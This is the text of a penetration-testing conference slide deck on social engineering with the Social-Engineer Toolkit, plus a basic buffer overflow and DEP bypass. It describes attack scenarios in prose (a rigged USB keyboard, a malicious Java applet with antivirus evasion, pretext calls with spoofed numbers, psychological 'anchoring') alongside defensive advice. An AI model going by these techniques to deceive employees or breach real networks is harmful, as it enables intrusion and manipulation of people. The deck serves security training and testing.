Hacking your perimeter. Social-Engineering Not everyone needs to use zero days David Kennedy (ReL1K) http://www.secmaniac.com Twitter: Dave_ReL1K
About the speaker Wrote the Social-Engineer Toolkit (SET), Member of the Social-Engineer.org podcast, contributor to Back Track, Metasploit, etc. Director of Information Security for a Fortune 1000 Penetration testing and exploit focus Worked for the US Marines, VP/Partner of a information security consulting firm.
Agenda q Overview of perimeter security q Main attack vectors utilized to compromise the perimeter q Walkthrough of each attack vector q Recommendations and conclusions 3
Overview q Security is getting better. Harder to find traditional vanilla attack vectors q Hackers adapt and overcome controls and technology put in place q We ll talk about social-engineering and the zero-day angle but there s still a ton of companies out there that do horrible when = to security. 4
Hacking your Perimeter q Traditional attack methods don t work q You ve undergone several dozen penetration tests and vulnerability scans q You have a security team and a functioning security program q You have anti-virus, HIPS, IPS, IDS, heuristics, and behavioral detection and prevention capabilities. 5
Perimeter Hacking Options q Social-Engineering and Physical attack vectors Probably our most preferred q Zero-Day Angle Crafting an exploit from your target 6
Social-Engineering and Security Why fight your: SIEM Anti-Virus HIPS/NIPS/IPS/IDS Web Application Firewall Secure Coding Practices Patch Management Why fight everything you ve built your entire security program on?
It s increasingly harder to break in on the external perimeter, adaptation occurs towards our weakest link, the human element.
The easiest way in It usually takes me a week of steady fuzzing and reversing to find a zero-day and craft a reliable exploit. It takes me a day to get access to the internal network from social-engineering.
It s not just us doing this The security community revolves around real world attacks. We are protecting against attacks out in the wild, hackers use social-engineering on a regular basis. State-sponsored attacks are the largest threat out there today. A country that has 10,000 people dedicated to hacking can t be good..
State-Sponsored Attacks q Big increase in targeted attacks against organizations in an effort to steal intellectual property and financial motivations. q Focused attacks that utilize specialized attacks are difficult to protect against. 11
Which country is the worst? Well Working with government agencies I really cant say
Completely unrelated slide
Why should they care? No repercussions (except from Google), almost untraceable, and cheap. Why build a new industry when you can take it?
Couple SE favorites Pretexting is your hack. What your going to do during your social-engineer attack. Nuero Linguistic Programming (NLP) How we think as humans
Steps of Anchoring Establish an Anchoring - This is triggering the stimuli that will be your ultimate Anchor. For example talking frantic, and in need of help. Firing your Anchor (also known as Activating) You ve triggered a feeling in the victim, you need help. Now you ask for that help.
So why use SE? We re lazy, we go for the easiest route.
Basics of SET Open-Source purely Python driven. SET utilizes Metasploit for both the exploit repository for client-side attacks and payloads. Multiple attack vectors specifically designed for Social- Engineering. Has become the standard for Social-Engineering in penetration tests across the world.
SET Attack Vectors Spear-Phishing Spoof or utilize already established email addresses to do spear-phishing attacks with fileformat attack vectors. Web Attacks Multiple attack vectors including java applet, client-side exploits, tabnabbing, man left in the middle, and the credential harvester. Malicious USB/DVD/CD Autorun creation, allows you to deploy MSF payloads in a simple autorun.
SET Attack Vectors Cont. Arduino / Teensy USB HID Attack Vector Multiple payload selection for the USB keyboard HID attacks.
Scenario 1 - USB HID Attack Vector Send an employee a brand new keyboard with all of the great bells and whistles with a company letter head saying we re doing updates to keyboards. Plugs in the device, motion sensors detect if user is on the system or not. Mouse is moved 1 pixel every 3 minutes to ensure screen is not locked.
DEMO
The keyboard attack Bypasses all autorun capabilities to execute arbitrary code on the system. Can drop malicious binaries, trigger overflows, utilize downloaders, implant keystroke loggers, or backdoor your stuff. Easily hidden in peripheral devices like docking stations, mouse, keyboard, computers, USB thumb drives, and much more
Integrating into Existing Hardware Most new keyboards have integrated USB Hubs.
Motion Sensor capabilities (thanks Garland)
Scenario 2 - Java Applet Attack You perform recon on the company your targeting. You learn their lingo, they structure, harvest email addresses, you know your pretext. You register a domain name similar to your victims. You call up the sales department claiming to be a customer that is experiencing issues connecting to your new company site.
DEMO
Thomas Werth Attack Vector Released at ShmooCon, this attack vector allows you to create a malicious Java Applet. User hits run and the payload is executed on the victims machine. Redirects user back to original site to make attack less conspicuous. Heavy obfuscation of java and payload for A/V bypass and fixed major issues with Linux/OSX payload deployment. Applet source just opened today!
DEMO
Multi Attack You want to build the best possible pretext and ensure that if one option fails, there are multiple redundancies within the attack to ensure success rates. You call the IT Help Desk claiming to be a high-level employee that is having issues getting to a mission critical website. You spoof your source number to come from the executives phone number.
DEMO
The Multi-Attack Vector As you can see, this attack vector has multiple attacks built into one website. Ability to have failover in case one attack option is not successful. Utilizes a combination of harvester, java applet, and client-side exploits in order to compromise the victim.
Why is it effective? We are humans, we are programmed from birth through our lives to act and behave a certain way. Our brains all work the same way, we are all vulnerable and there really is no patch.
The threat is real. So why use SET? This isn t FUD or overhype stuff. As to be incorporated into your normal penetration testing methodologies. It test s your security controls and information security awareness program and how effective you can stop these types of attacks.
Zero-Days q Zero days are defined as an attack vector that has not been patched or found before in the past. q Zero days are out there, they aren t public and they can be around for years without being released. q Adobe has lately been getting hit it seems like almost every week with a new zero-day. 36
Scenario 1 q Your performing a penetration test for CompanyXYZ, you have exhausted all manual efforts and have found no viable attack method through the perimeter. q Web applications are solid and have no apparent vulnerability. q The zero-day angle is your only option to gain access to the systems. 37
An introduction into Fuzzing q Brute force method to bug hunting. q Sends random commands in hopes of a crash. q Buffer length = 50 you send 51 38
Precursor q The example you are about to see is a basic overflow and is as easy as it gets. q There are several different types of overflows and different ways of exploiting them. q We ll talk shortly about Windows protection mechanisms, in this scenario they are disabled. 39
Buffer Overflow Example q SMTP server is susceptible to a stack based overflow in the EHLO parameter. q By sending 6000 \x41 s or ASCII = A causes a crash. q An attacker knows that a vulnerability is here and with further research can exploit this vulnerability. 40
Some Basic Instructions to be aware of q JMP Jump <address> (jump to instruction) q EIP Instruction Pointer (return address) q ESP Starter Pointer (where the beginning of our stack is) q NOP No operand (do nothing) q NOP Slide Multiple NOP s that create a slide affect 41
How Windows is setup 42
Before 43
After 44
Windows Protection Mechanisms q Data Execution Prevention In this attack if DEP was enabled the stack would be marked read only and fail q Stack Canaries (GS) Random cookie values are inserted to ensure stack integrity q Address Space Layout Randomization (ASLR) randomizes memory addresses by 2 bytes 45
Defeating Data Execution Prevention (DEP) (and ALSR) q Return-to-libc attack utilizing Return Oriented Programming (ROP). This can also defeat ASLR. q Remember when we inserted a JMP ESP command? Instead we can use gadgets to build our attack and prep our stack to call the WriteProcessMemory function. q This will copy our shellcode from our stack to a writable memory address (for example a kernel driver). 46
Protecting Against Overflows q Third party closed-source applications are tough. Having a mature third party application security review process is critical. q Internally developed software needs to undergo rigorous testing and source code analysis to ensure overflows are mitigated before reaching production. q Have a team dedicated to the research and protection to zeroday based threats and being able to detect these types of attacks from occurring. 47
Minimizing Zero-Day Damage q When utilizing overflows, generally a reverse connection is needed. q Ensure tight egress filtering is in place and that servers can only connect to what is absolutely necessary on the Internet. q Proper controls in place is OK. 48
Traditional Pentests are Dead
Out of scope.. Businesses don t understand what a true penetration test represents. No solid framework, not all of us get to do fun stuff like this Things are taken out of scope, and there s limited budget..
Where we need to go
If you aren t doing this If you aren t doing SE as apart of your regular penetration tests you are seriously missing out. If you don t know about this, you should learn Success ratio s for compromise with SET are estimated at around 94%.
Learning more about SE http://www.social-engineer.org - Created by Chris Hadnagy (loganwhd), great reference for Social- Engineering
Questions? davek@social-engineer.org Twitter: Dave_ReL1K